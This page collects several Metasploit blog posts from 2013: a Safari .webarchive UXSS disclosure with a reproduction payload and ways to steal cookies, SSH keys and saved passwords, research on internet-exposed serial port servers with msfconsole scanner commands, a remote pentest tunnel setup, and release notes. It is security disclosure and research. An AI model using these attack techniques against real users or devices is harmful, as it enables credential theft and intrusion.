Skip navigation
All Places > Metasploit > Blog
16 17 18 19 20 Previous Next

Metasploit

638 posts

owasp-top-10-webcast.pngFirst of all, a big thank you to all of you who participated in our OWASP Top 10 and Web App Scanning webcast last week. (If you missed it, you can view a recording here.) Because of an issue with the webcast platform, I wasn't able to see all of the audience questions while we were online. However, my colleagues were able to recover the unanswered questions, so I created questions and answers for them in the Metasploit discussion forum. Here they are:

 

 

If your question wasn't answered, please feel free to post it as a discussion in the Metasploit section. If you have a confidential question, please email info@rapid7.com

tldr: For now, don't open .webarchive files, and check the Metasploit module, Apple Safari .webarchive File Format UXSS

 

Safari's webarchive format saves all the resources in a web page - images, scripts, stylesheets - into a single file. A flaw exists in the security model behind webarchives that allows us to execute script in the context of any domain (a Universal Cross-site Scripting bug). In order to exploit this vulnerability, an attacker must somehow deliver the webarchive file to the victim and have the victim manually open it1(e.g. through email or a forced download), after ignoring a potential "this content was downloaded from a webpage" warning message2.

 

It is easy to reproduce this vulnerability on any Safari browser: Simply go to https://browserscan.rapid7.com/ (or any website that uses cookies), and select File -> Save As... and save the webarchive to your ~/Desktop as metasploit.webarchive. Now convert it from a binary plist to an XML document (on OSX):

 

plutil -convert xml1 -o ~/Desktop/metasploit_xml.webarchive ~/Desktop/metasploit.webarchive

 

Open up ~/Desktop/metasploit_xml.webarchive in your favorite text editor. Paste the following line (base64 for <script>alert(document.cookie)</script>) at the top of the first large base64 block.

 

PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

 

 

 

 

Now save the file and double click it from Finder to open in Safari:

 

 

 

 

You will see your browserscan.rapid7.com cookies in an alert box. Using this same approach, an attacker can send you crafted webarchives that, upon being opened by the user, will send cookies and saved passwords back to the attacker. By modifying the WebResourceURL key, we can write script that executes in the context of any domain, which is why this counts as a UXSS bug.

 

Unfortunately, Apple has labeled this a "wontfix" since the webarchives must be downloaded and manually opened by the client. This is a potentially dangerous decision, since a user expects better security around the confidential details stored in the browser, and since the webarchive format is otherwise quite useful. Also, not fixing this leaves only the browser's file:// URL redirect protection, which has been bypassed many times in the past.

 

Let’s see how we can abuse this vulnerability by attempting to attack browserscan.rapid7.com:

 

Attack Vector #1: Steal the user's cookies. Straightforward. In the context of https://browserscan.rapid7.com/, simply send the attacker back the `document.cookie`. HTTP-only cookies make this attack vector far less useful.

 

Attack Vector #2: Steal CSRF tokens. Force the browser to perform an AJAX fetch of https://browserscan.rapid7.com and send the response header and body back to the attacker.

 

Attack Vector #3: Steal local files. Since .webarchives must be run in the file:// URL scheme, we can fetch the contents of local files by placing AJAX requests to file:// URLs3. Unfortunately, the tilde (~) cannot be used in file:// URLs, so unless we know the user’s account name we will not be able to access the user’s home directory. However this is easy to work around by fetching and parsing a few known system logs4 from there, the usernames can be parsed out and the attacker can start stealing known local file paths (like /Users/username/.ssh/id_rsa) and can even "crawl" for sensitive user files by recursively parsing .DS_Store files in predictable locations (OSX only)5.

 

Attack Vector #4: Steal saved form passwords. Inject a javascript snippet that, when the page is loaded, dynamically creates an iframe to a page on an external domain that contains a form (probably a login form). After waiting a moment for Safari's password autofill to kick in, the script then reads the values of all the input fields in the DOM and sends it back to the attacker6.

 

Attack Vector #5: Store poisoned javascript in the user's cache. This allows for installing “viruses” like persisted keyloggers on specific sites... VERY BAD! An attacker can store javascript in the user's cache that is run everytime the user visits https://browserscan.rapid7.com/ or any other page under browserscan.rapid7.com that references the poisoned javascript. Many popular websites cache their script assets to conserve bandwidth. In a nightmare scenario, the user could be typing emails into a "bugged" webmail, social media, or chat application for years before either 1) he clears his cache, or 2) the cached version in his browser is expired. Other useful assets to poison are CDN-hosted open-source JS libs like google's hosted jquery, since these are used throughout millions of different domains.

 

Want to try for yourself? I've written a Metasploit module that can generate a malicious .webarchive that discretely carries out all of the above attacks on a user-specified list of URLs. It then runs a listener that prints stolen data on your msfconsole.

 

Unless otherwise noted, all of these vectors are applicable on all versions of Safari on OSX and Windows.

 

Disclosure Timeline

 

DateDescription
2013-02-22Initial discovery by Joe Vennix, Metasploit Products Developer
2013-02-22Disclosure to Apple via bugreport.apple.com
2013-03-01Re-disclosed to Apple via bugreport.apple.com
2013-03-11Disclosure to CERT/CC
2013-03-15Response from CERT/CC and Apple on VU#460100
2013-04-25Public Disclosure and Metasploit module published

 

 


 

 

 

Footnotes
  1. Safari only allows webarchives to be opened from file:// URLs; otherwise it will simply download the file.
  2. Alternatively, if the attacker can find a bypass for Safari's file:// URL redirection protection (Webkit prevents scripts or HTTP redirects from navigating the user to file:// URLs from a normal https?:// page), he could redirect the user to a file URL of a .webarchive that is hosted at an absolute location (this can be achieved by forcing the user to mount an anonymous FTP share (osx only), like in our Safari file-policy exploit). Such bypasses are known to exist in Safari up to 6.0.
  3. Unlike Chrome, Safari allows an HTML document served under the file:// protocol to access *any* file available to the user on the harddrive
  4. file:///var/log/install.log
    file:///var/log/system.log
    file:///var/log/secure.log

  5. file:///Users/username/Documents/.DS_Store
    file:///Users/username/Pictures/.DS_Store
    file:///Users/username/Desktop/.DS_Store

  6. X-Frame-Options can be used to disable loading a page in an iframe, but does not necessarily prevent against UXSS attacks stealing saved passwords. You can always attempt to pop open a new window to render the login page in. If popups are blocked, Flash can be used to trivially bypass the blocker, otherwise you can coerce the user to click a link.

Pull Requests: Want to help?

Metasploit has a first world problem: We get so much code from contributors out in the world, it gets hard to keep up. Most open source projects aren't popular enough to warrant more than three or four contributors, total. Metasploit has over two hundred, last I checked. We're no Rails (those guys have over 2,000 contributors), but for security software, that's not too bad.

 

The problem is, our backlog of outstanding pull requests (PRs) is steadily increasing, and now we're now floating about a hundred outstanding pull requests. Since Metasploit is fundamentally a communal effort, I'm hopeful that you generous folks out there in Open Source Land can maybe help us take a bite out of this backlog.

 

First off, check out the new Landing a Pull Request guide. While you might think that this guide is meant only for Rapid7 employees, it's not. The power of GitHub as a source control management system lies in the ability for literally anyone to contribute fixes in a distributed way. Let me quote from the Collaboration between Contributorssection:

If Alice knows a solution to Bob's pull request that Juan pointed out, it is easy for Alice to provide that solution by following [this procedure]. Git blame will still work correctly, commit histories will all be accurate, everyone on the pull request will be notified of Alice's changes, and Juan doesn't have to wait around for Bob to figure out how to use send_request_cgi() or whatever the problem was."

 

What this means is that if you see something languishing in our pull queue, and you think you can help move things along, go for it! Most of the time, PRs don't get landed due to a lack of verification or testing. So, while some old PR might get solved with some bugfixes, more likely, what we really need is some solid verification procedure to prove that the PR actually works. Even better, for non-module PRs, would be some rspec tests added to the outstanding PR. Merely +1'ing a PR isn't likely to be very helpful, but squeaky wheels do get greased. The point is, the opportunities to collaborate on advancing the state of the art in open source security development really are there for the taking.

 

Intern Sought

Speaking of contributing, summer is approaching, and that means it's time to start trolling (trawling?) for interns. We have a pretty formidible job description up, but if you're reading this blog, you probably already have some deep and abiding interest in open source security software, so feel free to pop your resume off to me at todb at metasploit dot com. If you already live here in Austin, then hooray for you, since this internship requires a fair amount of in-person showing up to the office. If you already have contributed code to Metasploit or some other open source project, then you are already way ahead of the game and I would be very interested in talking to you.

 

If interning isn't your thing, but you know an enterprising college student who might be a good fit, give them the shortlink: http://r-7.co/MSF-INTERN.

 

Armitage and MSFGui

Finally, as mentioned in the Metasploit 4.6.0 release notes, we've removed the two alternate Java front ends, Armitage and MSFGui, from Metasploit's main distributions. Those projects, run by Raphael @armitagehacker Mudge and Matthew @scriptjunkie Weeks, respectively, are now being distributed separately from the framework source repository. You can track them at http://www.fastandeasyhacking.com/manual (for Armitage) and http://www.scriptjunkie.us/msfgui/ (for MSFGui). So, if you are sitting on a source checkout of Metasploit and you find that your Java client doesn't work any more, that's probably why. You can get your install back in shape by just fetching from upstream, direct from those guys.

 

New Modules

We've got four new modules this week. We've been busy preparing for conference season, so module throughput has been a little slower than usual.

 

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Introduction

 

At the InfoSec Southwest 2013 conference I gave a presentation on serial port servers. This presentation was drawn from research that tried to determine how prevalent and exposed internet-connected serial port servers are. The results were pretty scary - authentication was rarely implemented and the types of devices exposed ranged from corporate VPN servers to traffic signal monitors. This post attempts to summarize that presentation, but the deck itself has more details. If you are unfamiliar with serial port servers or looking for some additional background, please consult the FAQ.

 

 

Background

Serial port servers, also known as terminal servers, are designed to allow remote access to the serial port of another device over TCP/IP.

These devices serve three primary functions

  • Provide remote access to non-networked equipment such as environment controls, industrial automation, and monitoring systems.
  • Provide remote access, location tracking, and monitoring of physically mobile systems, including vehicles and cargo containers.
  • Provide out-of-band access to network and power equipment for the purpose of recovery in the case of an outage.

 

A typical serial port server is a box the size of a home router with one or more serial ports on one side and an ethernet, wireless, or mobile interface on the other. The serial port is connected to a target device, such as a router, server, or industrial control system, and the serial port server is configured to allow remote access to this port. Some examples of serial port servers are shown below.

 

serials.png

 

 

 

 

Authentication

 

There are three common ways for a user to access a remote serial port

  1. They login via telnet, ssh, or the web interface and directly type commands on the serial device.
  2. They connect to a specific TCP port that acts as a proxy for the serial port, allowing immediate access to the serial device.
  3. They configure vendor-specific software to access the serial port over a proprietary protocol.

 

In the first case, the serial port server requires some form of authentication before the user can interact with the serial-connected device. The most secure method is over a SSH session, but unless the attacker can eavesdrop on your connection, even telnet will do in a pinch.

 

In the second case, this is typically a clear-text TCP connection, accessed using the telnet command, and without any imposed authentication by the serial port server. If the serial-connected device requires authentication to access the serial console, this is the only layer of defense. The third case is usually identical, however some protocols (RealPort) can be configured to use both encryption and shared key authentication. In practice, however, these are mostly clear-text and unauthenticated as well.

 

In summary, we have a serial port exposed directly to the network. If the serial port is connected to a device that requires authentication, such as a Linux server, or a Cisco IOS router, it is theoretically protected from unauthorized access unless the attacker knows the correct password. Many serial devices do not require authentication and instead assume that if you are physically connected to a serial port, you probably have the right to configure the system.

 

 

Serial port servers change the authentication model in two significant ways. First, the concept of trusting a physical port goes out the window when that port is exposed to the internet, especially without an initial layer of authentication. Second, there is a significant difference between a SSH or telnet session and an authenticated serial console. If the user disconnects from SSH or telnet, the session is closed. This is not the case with serial consoles unless the device automatically logs out due to inactivity. Very few systems support inactivity timers on serial consoles (Cisco is one of the exceptions). An attacker just has to wait for a valid user to authenticate. Once logged in, the attacker can either hijack the serial port connection or wait for them to become idle and then steal a pre-authenticated shell on the target device.

 

The end result is that both the TCP proxy and proprietary access protocols lead to a situation where most of the serial ports they expose either require no authentication for an attacker to access. An analysis of internet-exposed serial port servers uncovered over 13,000 root shells, system consoles, and administrative interfaces that did not require authentication, many of which had been pre-authenticated by a valid user.

 

An example of an serial port connected to a pre-authenticated root shell is shown below.

 

$ telnet 1.2.3.4 2001

Trying 1.2.3.4...

Connected to 1.2.3.4.

Escape character is '^]'.

 

# uname -v

FreeBSD 7.3-STABLE #0

 

# uptime

3:48AM  up 701 days, 13:22, 1 user, load averages: 0.00, 0.00, 0.00

 

 

 

Internet Exposure

 

Over 114,000 unique IPs were identified as either Digi International or Lantronix serial port servers using the Simple Network Management Protocol (SNMP) with the community "public". Over 95,000 of these systems were exposed to the internet through mobile connections such as GPRS, EDGE, and 3G. Another 14,000 unique IPs were identified running Digi, or Digi-based devices using Digi's proprietary Advanced Device Discovery Protocol (ADDP). FTP banners were used to identify another 8,000 Digi devices. Another 500 Lantronix systems were identified using their telnet banners. Web server headers, SSL certificates, and telnet prompts were useful, but generally not conclusive on their own to identify serial port servers.

 

Three sets of data were used to identify open serial consoles. First, the Internet Census 2012 data was analyzed for TCP ports 2001-2010 and 3001-3010. These ports are commonly used by Digi and Lantronix devices as TCP proxies for the first 10 configured serial ports. Second, the raw responses for port 771 were analyzed to detect instances of the RealPort proprietary service used by Digi serial port servers. Finally, the devices running the RealPort service were queried to obtain the banners from each attached serial ports. The final result was a set of banners that could be matched against common serial console and device menu fingerprints. Overall, a little over 13,000 unique serial ports were exposed that offered some form of system shell, console, data feed, or administrative menu.

 

 

 

Metasploit Modules

 

A handful of Metasploit modules have been written to identify and assess serial port servers made by Digi International. To use these modules, first download Metasploit, and access the Metasploit Console or the modules tab of the Metasploit web interface.

 

ADDP Discovery: auxiliary/scanner/scada/digi_addp_version


The digi_addp_version module can be used to identify Digi and Digi-based devices that have the ADDP service enabled.

 

$ msfconsole

msf > use auxiliary/scanner/scada/digi_addp_version

msf auxiliary(digi_addp_version) > set RHOSTS 192.168.0.60

msf auxiliary(digi_addp_version) > run

[*] Finding ADDP nodes within 192.168.0.60->192.168.0.60 (1 hosts)

[*] 192.168.0.60:2362 ADDP hwname:Digi Connect WAN Edge10 hwrev:0

fwrev:Version 82001160_J1 01/04/2007

mac:00:40:9D:2E:AD:B2 ip:192.168.0.60 mask:255.255.255.0  

gw:192.168.0.1 dns:0.0.0.0 dhcp:false 

ports:1 realport:771 realport_enc:false magic:DIGI


 

ADDP Reboot: auxiliary/scanner/scada/digi_addp_reboot


The digi_addp_reboot module can be used to reboot Digi devices that have the ADDP service enabled. In contrast to the version module, you may need to set the ADDP_PASSWORD variable to the "root" password if the default of dbps is not configured. Keep in mind that many devices that are based on the Digi platform do not let the user configure or disable the ADDP service at all. In addition to rebooting the device, ADDP can be used to change the IP configuration, including the DNS server, which can lead to some particularly nasty attacks when the Digi device is used as a router.

 

$ msfconsole

msf > use auxiliary/scanner/scada/digi_addp_reboot

msf auxiliary(digi_addp_reboot) > set RHOSTS 192.168.0.60

msf auxiliary(digi_addp_reboot) > run

 

RealPort Discovery: auxiliary/scanner/scada/digi_realport_version


The digi_realport_version module can be used to identify Digi and Digi-based devices that use the RealPort protocol to expose serial ports. The module will identify the platform in use and indicate how many physical serial ports are present on the device.

 

$ msfconsole

msf > use auxiliary/scanner/scada/digi_realport_version

msf auxiliary(digi_realport_version) > set RHOSTS 192.168.0.60

msf auxiliary(digi_realport_version) > run

[*] 192.168.0.60:771 Digi Connect WAN ( ports: 1 )

 

 

RealPort Discovery: auxiliary/scanner/scada/digi_realport_serialport_scan


The digi_realport_serialport_scan module will attempt to retrieve a banner from each configured serial port at various baud rates. Keep in mind that the RealPort TCP service does not have to live on port 771, so portscan the device and use the ADDP modules to identify the realport service. The example below identifies a Linux root shell present on serial port 1.

 

$ msfconsole

msf > use auxiliary/scanner/scada/digi_realport_serialport_scan

msf auxiliary(digi_realport_serialport_scan) > set RHOSTS 192.168.0.60

msf auxiliary(digi_realport_serialport_scan) > run

[*] 192.168.0.60:771 [port 1 @ 9600bps] "[root@localhost root] # \r\n"

 

 

Not Serial

 

Serial port servers were the focus of this research, but as the project progressed it became clear that many of these devices are also used to manage other types of connections. For example, security systems may be connected via Digi WAN devices, but instead of using a serial port, the Digi device is monitoring signals on GPIO pins. In the case of smart grid power meters, the Digi device was using Zigbee to communicate with the meters, and streaming the data back over MODBUS.  Even though the primary use case is often serial port access, these devices are used to connect, translate, and proxy much more than that.

 

 

Remediation

 

The biggest challenge right now is awareness. Few organizations are aware that their equipment can be accessed through serial ports connected through mobile networks. In some cases, the organization may assume that their specific mobile configuration prevents access from the internet, when that may not be the case. The wide use of mobile connections makes detection and response much more difficult. There are some basic steps that can significantly reduce the risk of an attack through an exposed serial port server.

 

  • Only use encrypted management services (SSL/SSH)
  • Set a strong password and non-default username
  • Scan for and disable ADDP wherever you find it
  • Require authentication to access serial ports
    • Enable RealPort authentication and encryption for Digi
    • Use SSH instead of telnet & direct-mapped ports
  • Enable inactivity timeouts for serial consoles
  • Enable remote event logging
  • Audit uploaded scripts

 

 

Conclusion

 

There are over 114,000 serial port servers accessible from the internet, with over 95,000 connected via mobile providers. These expose over 13,000 serial ports that offer some level of administrative access to any attacker that happens to connect. There is a little awareness of how exposed these devices are and no real push by either users or vendors to improve the situation. A list of vulnerable organizations can be pulled from public sources such as SHODAN and the Internet Census 2012 data set. The sheer number of critical, bizarre, and just plain scary devices connected to the internet through serial port servers are an indication of just how dangerous the internet has become.

Java Payload Cleanup

If you've been watching the Metasploit source repository, you will have noticed some movement in Java Payload land -- specifically, PR#1217, which landed this week. Thanks to the refactoring efforts of Michael @mihi42 Schriel, testing by @Meatballs, and integration from James @egyp7 Lee, the Javapayload and Java Meterpreter projects can now more easily be hacked at with Eclipse, a preferred IDE for Java nerds. There's also a slew of new unit tests, so you have more assurance that your hackery won't break existing functionality. This is good news for you if you are a) more of a Java guy than a Ruby guy, and b) you want to make meaningful contributions to the Metasploit framework. Thanks a ton, guys!

 

ZDI Sport Fishing

This week also sees a trio of ZDI-derived Metasploit modules -- we have exploits now for ZDI-13-051, ZDI-13-052, and ZDI-13-053. They all target the HP Intelligent Management Center (IMC), and all three were initially reported to the Zero Day Initiative (ZDI). ZDI, if you weren't aware, is now part of HP's new HP Security Research (HPSR) group. Yes, that's a lot of acronyms.

 

ZDI-disclosed vulnerabilities are especially attractive for some exploit developers, including our own Juan Vazquez. By dint of being disclosed by ZDI, we know for sure that some money has already changed hands. This makes them de-facto "high value" vulnerabilities, and not just goofy crashes or exposed in unlikely, contrived attack scenarios. In addition, we know that there are organizations out there who put a premium on protecting against ZDI vulns. Those folks like to be able to use Metasploit modules to test the efficacy of their defenses, both pre- and post-patch.

 

This is all incidental to the fact that ZDI vulns are generally rewarding to research. It's like fishing in a pond that you know is stocked; it's a lot easier to be confident and be successful when you know for sure that there is an exploit worth catching there. If you're looking to get involved with exploit development on targets that aren't just toys or CTF targets, ZDI can provide a pretty rich target landscape.

 

New Modules

Besides HP IMC, we of course have a passel of new modules. Passel?  How about a clutch? No, a murder. Of course. Below is this week's murder of Metasploit modules.

 

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

remote-security-audit.jpgAn internal penetration tests simulates an attack on the network from inside the network. It typically simulates a rogue employee with user-level credentials or a person with physical access to the network, such as cleaning staff, trying to access resources on the network they're not authorized for.

 

Internal penetration tests typically require the auditor to be physically present in the location. If you are working as a consultant, then conducting internal penetration tests can mean a lot of travel. Unless the networks you have to audit are in prime vacation spots, this can be a drag, and it's expensive because it reduces billable time and incurs higher T&Es for your customer.


Here's an approach on how you can eliminate the need to travel and still get the same work done. One advantage of this approach is that this approach does not require you to ship an appliance or device to the customer that must later be returned. Also, this doesn't only work for consulting shops but also for large companies with internal penetration testers who need to audit several sites.

 

Set up SSH server on the Internet

 

In this example, we set up an Ubuntu server hosted in the cloud. However, you could do this with any server that has an internet-facing IP address. In this example, the server has the address 192.0.2.1 and you will be auditing from 198.51.100.0/24. Here's what you do next:


  • Install the SSH server on the machine using sudo apt-get install openssh-server
  • Setup up a new account for user tunneluser with command sudo adduser tunneluser
  • Set up an SSH account for user tunneluser
  • Open the file /etc/ssh/sshd_config and append the line GatewayPorts yes
  • Configure the server to only accept access to port 3790 from your own network with iptables rules like this:

  iptables -A INPUT -P DROP

  iptables -A INPUT -p tcp --dport ssh -j ACCEPT

  iptables -A INPUT -p tcp --dport 3790 --source 198.51.100.0/24 -j ACCEPT

 

 

Create a virtual machine running Metasploit Pro

 

Next, you need to set up the virtual machine you'll make available to your customer.

 

  • Create a virtual machine running Ubuntu 12.04
  • Generate an SSH key for tunneluser with ssh-keygen
  • Copy the resulting public key file (~/.ssh/id_rsa.pub) to /home/tunneluser/.ssh/authorized_keys on the Ubuntu machine created in the previous section. Prepend no-pty,command="/bin/false" to the key. This will ensure that someone who grabs the key from your VM will not be able to take control of the tunnel server. Both steps here can be performed with a single command:

  (echo -n 'no-pty,command="/bin/false" '; cat id_rsa.pub) >> ~/.ssh/authorized_keys

  • Ensure that the network adapter is set to bridged (payloads won't be able to connect back if the machine is NATed)
  • Download the latest version of Metasploit from www.rapid7.com
  • Install Metasploit on the machine
  • Create your Metasploit user name and password on the machine
  • Activate your Metasploit Pro license (if you don't have a license, sign up for the 7-day trial)
  • Create a start-up script  that contains only the following line: ssh -n -R3790:localhost:3790 tunneluser@192.0.2.1
  • Shut down the virtual machine

 

Have your client run the virtual machine in their network

 

Next, you'll have to ask your client to run the virtual machine on their network.

 

  • Zip the virtual machine and make it available to your client as a download (or FedEx a DVD)
  • Have the client boot the virtual machine on their network, where it gets a local IP address through DHCP
  • Ask the customer to log in to the machine, which launches the start-up script, creating outbound SSH connection to your server.

 

Start your internal security audit - remotely

 

Time to get started on your internal security audit:

 

  • Point your browser to https://1.2.3.4:3790 and log in to Metasploit Pro.
  • All of your commands will be executed on the virtual machine inside your client's network.
  • When you're done, you can download the project file and reports through the browser directly onto your machine.
  • To end the engagement, ask your client to shut down the virtual machine. Note that all the data from the engagement is saved on this virtual machine, so you should either securely archive it or delete it.

 

Here's a network diagram of what you just set up:

 

Internal-pentest-remotely-metasploit.png

 

Security considerations

 

Providing remote access to a local network can introduce security issues. However, the approach taken in these instructions are less dangerous than a user-level VPN access:


  • The access needs to be initiated from the inside of the network, while VPN connections are initiated from the outside.
  • The virtual machine only has network access, while the VPN user also has credentials to access the network's resources
  • All network communication is encrypted (VM to server: SSH, browser to server: SSL)
  • Strong authentication is used for all connections (VM to server: SSH, browser to server: user/password)
  • Access to Metasploit Pro is limited to the network range of the consultant's network

 

Please let me know if you've had good experience with this approach, or if you have taken a slightly different approach that you would like to share.

Today, we released Metasploit Pro 4.6, which brings you some awesome new features for your enterprise security program.


Updated Web Application Security Testing with Support for OWASP Top 10 2013


Web applications are gaining more and more traction, both through internally developed applications and by adding SaaS-based solutions. These applications often contain some of the most confidential information in the organization, such as financial and customer data, credit card numbers, medical data, and intellectual property. To enable you to audit the security of these applications, Metasploit Pro's web application auditing functionality has been significantly enhanced in the new release:

 

  • web-app-testing-wizard.pngSupport for OWASP Top 10 2013: Release 4.6 broadens the scope of Metasploit’s security auditing with the inclusion of testing capabilities for the upcoming Open Web Application Security Project (OWASP) Top 10 2013, which is currently in the Release Candidate stage. The list identifies ten of the most critical risks relating to web applications. Due to the popularity of, and increasing reliance on, web applications, they are involved in the majority of breaches. Metasploit addresses this, enabling organizations to audit the security of their web-based applications, whether they be out of the box or custom, on-premise or in the cloud. This helps security professionals identify issues before a malicious attacker does. Learn more about what's new in our OWASP Top 10 2013 webcast.
  • Revamped user interface: Metasploit's web application security testing is now easier to use and includes a wizard that walks you through the process. This speeds up the process for seasoned web application penetration testers, and makes it really easy for new users to conduct baseline assessments.
  • More effective website spider: Like Google crawling the web to index pages, Metasploit Pro's spider follows linked pages to map out the entire application. The updated spider is now more efficient and follows harder to find links to ensure comprehensive testing.
  • Get shells using SQL injection: SQL injections are among the top reasons of compromise for web applications, posing a huge risk to confidential data. Most SQL injection attacks give you access to the data in the database; Metasploit Pro's new SQL injection attacks go beyond this, giving penetration testers a session on the machine, which is equivalent to having administrative rights on the machine. This gives the penetration tester not only access to the database but also to other information on the machine, and opens the door to pivot to other machines.
  • Support for web app authentication: Many web applications require log in credentials for access. Metasploit Pro now supports the five most common authentication types.
  • Web app report with remediation advice: Finding vulnerabilities is great, but the goal is to eliminate them. The remediation advice provided in Metasploit's reports should serve as a valuable basis for discussions with internal developers and external SaaS application providers.

 

Security Auditing Wizards Accelerate Engagements, Simplify Baseline Assessments


metasploit-wizards.pngMetasploit Pro 4.6 also introduces the concept of Security Auditing Wizards, which walk the user through the steps of a typical engagement. Seasoned penetration testers will find that the wizards shortcut the first steps of an engagements, making them more productive. For new Metasploit Pro users, the new wizards provide a great way to easily conduct baseline assessments to find low-hanging fruit. Release 4.6 introduces three new wizards:


  • Quick Penetration Testing Wizard: This wizard guides security professionals through a baseline penetration test. Only requiring users to enter an IP range, the wizard discovers assets, fingerprints hosts, determines potential attacks, runs exploits of a certain safety level, and provides a report. The wizard can either serve as a first step for a more in-depth security assessment or for a baseline penetration test to find low-hanging fruit, either as a regular security practice or before a third-party audit to make it more effective.
  • Web Application Testing Wizard: Requiring only a base URL to start, this wizard crawls the web application, finds exploitable vulnerabilities, and creates a report with remediation information. It is a great, quick way to assess the security of an application during regular assessments or as a gate before releasing it to production.
  • Phishing Simulation Wizard: Phishing emails with links or attachments that try to exploit a user's machine are a big threat vector for many organizations, both for spear phishing and for untargeted attacks. Metasploit Pro's social engineering campaigns enable organizations to measure their exposure by sending simulated phishing emails, both to get a general sense of the size of risk and to verify a reduction of risk after conducting security awareness trainings. 


TL;DR - Or "Video Killed the Blogging Star"


Can't be bothered to read all this? I'm giving a quick overview of the Metasploit Pro 4.6 release in today's Whiteboard Wednesday.


metasploit-4-6-whiteboard-wednesday.png


Metasploit Pro 4.6 is available for download now


All of these improvements in Metasploit Pro 4.6 are in addition to the weekly updates to all Metasploit editions, both free and commercial ones (read todb's awesome post on Metasploit Framework updates). Existing users of Metasploit can update their installation using the in-product update feature (Kali Linux users may see the update in four hours at the latest as the Kali repos synch).


If you want to learn more about what's new in OWASP Top 10 2013, reserve a free seat in our OWASP webcast today.


For free trial of Metasploit Pro, download the Metasploit installer now.

todb

Metasploit 4.6.0 Released!

Posted by todb Employee Apr 10, 2013

We just released Metasploit 4.6.0, so applying this week's update will get you the brand new version. While Chris has a delightful blog post of what all is new in Metasploit Pro, let's take a look at what's exciting and new between Metasploit 4.5.0 and today's update to 4.6.0.

 

138 new modules

 

First off, the hacker elves have been cranking out a ton of module content since we released 4.5.0 back in December, 2012. Between then and now, we've got 138 new modules. That's 1.1 new modules per day, including those days that other people call "weekends" and "holidays." Of those, we have 80 new exploits, 44 new auxiliary modules, and 12 new post modules.

 

Of course, most of the module commits don't originate with us here at Rapid7. Over this release, we have 86 distinct committers contributing to Metasploit, and only 11 of them are employed here at Rapid7. It's this overwhelming strength of the Metasploit exploit development community that keeps me super-excited to do Good Work every day. Seriously, thank you all for that. I'm getting all verklempt here.

 

A stroll down diff lane

 

Of course, we did a little more than just sling exploit code for 4.6.0. We also moved the ball forward on a whole bunch of core development and security research. Here are the highlights:

  • We got serious about unit testing. Exploit writers are notorious for writing quick, throw-away code, born of the race to get a working PoC together before the next guy (and the next patch!). Since Metasploit Framework is largely written by exploit devs, this habit has been really hard to combat. That said, on the road to 4.6.0, we integrated Travis-CI to run our growing library of RSpec tests. We're a long way from done there, of course, but we've made some pretty significant progress.
  • We detailed our peer code review practices for landing new code and new modules. Open source security development means taking risks, leaving your comfort zone, and suffering the slings and arrows of code review. Believe me, it's a lot easier to just pile on hack after hack when you're sitting in your closed-source cubicle farm, but developing in public means that we get to review and critique code from all comers. In the end, we hope we're being helpful, and fewer mistakes are repeated for next time.
  • We ported a bunch of 0day for Metasploit users. This kind of fast turnaround immediately puts the tools to test and validate remediation directly in the hands of the people who are best positioned to help: you. In addition, Metasploit exploits are now making it into other projects' regression testing cases, and are used to teach the next wave of security researchers how to quickly turn a found-in-the-wild 0day into a useful, safe, and effective exploit module.
  • We implemented a pretty novel new Postgres payload delivery system -- just in time for the recent wave of Postgres vulnerabilities! Nothing proves a vulnerability better than popping shells.
  • We invented a portable Ruby command exec payload to take advantage of the wave of Rails vulnerabilities announced these last couple months. While getting a rails server to print "hello world!" on the console is all well and good, it's really all about the shells.
  • We updated msfupdate to fully take advantage of our Git-based source code control systems, as well as to use the Metasploit Community and Pro edition update systems. We recognize that most Metasploit users really just want stability and security in their updates, and tracking along a source code tree isn't usually the way to get there. So, now installed versions of Metasploit (including Kali-installed Debian packages) will only update once a week, after the usual in-house QA and validation.
  • We turned exploited endpoints into Hollywood-hacker spy systems. Thanks to a user bug, we found that the record_mic feature of Meterpreter had been broken for a little while. So, we fixed it, wrapped it up in a post module, added a webcam activation module and some CCTV controller, and unleashed these A/V-centric modules into the world. I have no idea if real espionage agents actually do this kind of thing or not, but now you can prove that they can on your next pentest engagement. After all, that's kind of the point of a penetration test -- you want to be able to simulate what a real adversary could do in order to bring attention to the real risk of vulnerabilities.
  • We put together some UPnP modules to help people scan their enterprises for misconfigured and buggy UPnP endpoints. You are blocking and watching UDP port 1900 by now, right?
  • We asked you nicely to msftidy.rb your modules as part of a Git pre-commit hook. Since we started automating msftidy, the module quality we've been seeing shot up considerably, and we've been able to move new modules through the pull request queue a lot faster with a lot fewer common mistakes. Of course, as a result, we now get more pull requests. I'm sure there's an economics lesson about friction in there somewhere.
  • We started using a new heap spray technique for our many browser-based exploits. This was on the heels of some very excellent training and collaboration with the Corelan Team. Now, with a little luck, we can write more reliable exploits all the way through Internet Explorer 10, as well as Firefox 54 (or whatever their latest version is by the time this post goes live).
  • We now support Kali as an installation target. This was a huge accomplishment, thanks to the teamwork between Rapid7 and Offensive Security, getting a stable, supportable build into the hands of Kali Linux users worldwide. Assuming this ends up working out as we expect, we should be able to start supporting other platforms, such as Ubuntu, Debian, and Mint, with proper Debian packages. (We're also experimenting with a for-real Homebrew tap for you Mac OSX guys, but shhh it's not official yet.)
  • We pushed the envelope on WAP/Router hacking by landing a metric ton of exploit and auxilary modules targeting Linksys, D-Link, and Netgear devices, as well as putting together command execution payloads custom built for MIPS computing environments.

 

So, yeah. Been a busy four months or so. All of those bullets start with the word "we," and like I said, that's not just Rapid7 folks; it's all of you who pitched in with your work, patience, smarts, and gumption to get this thing out the door. Thanks!

 

Module roundup

 

If you're upgrading from 4.5.0 to 4.6.0, here's the laundry list of security testing goodness you have to look forward to. Let's be careful out there!

 

 

Availability

